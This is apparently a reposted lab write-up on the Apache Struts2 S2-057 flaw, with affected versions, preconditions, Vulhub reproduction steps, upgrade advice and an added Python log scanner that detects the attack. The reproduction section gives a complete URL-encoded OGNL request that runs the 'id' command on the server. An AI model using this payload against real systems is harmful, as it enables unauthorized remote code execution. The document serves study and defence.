Struts2 S2-057 Remote Code Execution Vulnerability
I. Vulnerability overview
(1) Identifier
S2-057
(2) Summary
S2-057 arises from the site's XML configuration: the namespace value is not strictly sanitised and can be written into the XML, and the url tag's value is likewise not filtered for wildcards. Together these allow remote code and system commands to be executed on the server.
(3) Affected versions
Apache Struts 2.3 – Struts 2.3.34
Apache Struts 2.5 – Struts 2.5.16
(4) Preconditions
- alwaysSelectFullNamespace is true, and
- the action element has no namespace attribute, or uses a wildcard.
The namespace is then taken from the user-supplied URI and evaluated as an OGNL expression, which ultimately leads to remote code execution.
II. Reproduction steps
(1) Vulhub IP address: http://192.168.126.136
Files are located at: /home/vulhub/vulhub-master/struts/S2-057
1. Build the environment: docker-compose build, then docker-compose up -d
2. Check that the containers are running: docker-compose ps

(2) Windows
1. Open the Struts test page: http://192.168.126.136:8080/struts2-showcase

2. Turn on request interception in the proxy and click View.

3. Send the request to Repeater, modify the GET path, then click Go.

Clicking Go gives the result shown in the figure below, which confirms the vulnerability: the result of 200*200 is returned in the Location header.
4. Modify the request. The request contents are:
GET /struts2-showcase/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27id%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action HTTP/1.1
Host: xx.xx.xx.xx:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: pma_lang=zh_CN; PHPSESSID=ktl19cua6l8te70hdre5vti097; security=low; JSESSIONID=8A451123FAEEC6210EA07D642B8D4778
Connection: close
The path segment between /struts2-showcase and /actionChain1.action is the constructed OGNL expression; id is the command it executes.
The command executes successfully.
III. Mitigation
(1) Upgrade to Apache Struts 2.3.35 or Struts 2.5.17 as soon as possible.
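As an added example that is not part of the original post, the checker below turns the precondition described in section I(4) into a detection: the path before the last "/" is what Struts takes as the namespace, so a namespace segment that contains "${", "%{" or an "@pkg.Class@member" static reference in access logs is a strong indicator of an S2-057 attempt. The common-log-format lines and sample paths are constructed for illustration, and the two markers are heuristics, not a complete signature.

```python
"""Flag requests whose Struts 2 namespace segment carries an OGNL expression (S2-057 pattern).
Added example, not from the original post: with alwaysSelectFullNamespace=true and no namespace
on the action, the path before the last '/' becomes the namespace and is evaluated as OGNL."""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
192.168.126.1 - - [12/Aug/2018:10:00:01 +0000] "GET /struts2-showcase/actionChain1.action HTTP/1.1" 302 -
192.168.126.1 - - [12/Aug/2018:10:00:02 +0000] "GET /struts2-showcase/$%7B200*200%7D/actionChain1.action HTTP/1.1" 302 -
192.168.126.1 - - [12/Aug/2018:10:00:03 +0000] "GET /struts2-showcase/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%7D/actionChain1.action HTTP/1.1" 302 -
192.168.126.1 - - [12/Aug/2018:10:00:04 +0000] "GET /struts2-showcase/showcase.action?id=%24%7B1%7D HTTP/1.1" 200 4096
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # request target inside the quoted request line
OGNL_EXPR_RE = re.compile(r'[$%]\{')                    # ${...} or %{...}
STATIC_ACCESS_RE = re.compile(r'@[\w.]+@\w+')           # @pkg.Class@member static reference

def fully_decode(text, max_rounds=3):
    """Percent-decode until stable, so double-encoded payloads are seen as the server sees them."""
    for _ in range(max_rounds):
        text, prev = unquote(text), text
        if text == prev:
            break
    return text

def namespace_of(target):
    """Decoded namespace: the request path minus the query string and the final action segment."""
    path = fully_decode(target).split('?', 1)[0]
    return path.rsplit('/', 1)[0]

def inspect_target(target):
    """Reasons the target looks like an S2-057 attempt; an empty list means the namespace looks clean."""
    ns = namespace_of(target)
    reasons = []
    if OGNL_EXPR_RE.search(ns):
        reasons.append('ognl-expression-in-namespace')
    if STATIC_ACCESS_RE.search(ns):
        reasons.append('static-member-access')
    return reasons

def scan_log(lines):
    """Return (line number, decoded namespace, reasons) for every suspicious request line."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match and (reasons := inspect_target(match.group(1))):
            findings.append((lineno, namespace_of(match.group(1)), reasons))
    return findings

if __name__ == '__main__':
    print(*scan_log(SAMPLE_LOG.splitlines()), sep='\n')
```

Only the namespace part of the path is inspected, so the fourth sample line, which carries "${" in its query string rather than in the namespace, is deliberately not flagged by this check.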
References: https://blog.csdn.net/lhh134/article/details/87368699
https://cloud.tencent.com/developer/article/1511916
https://www.jianshu.com/p/6db98793d043
https://blog.csdn.net/Z_Grant/article/details/101213506
Please credit the source when reposting. Original link: https://www.uj5u.com/qita/23033.html
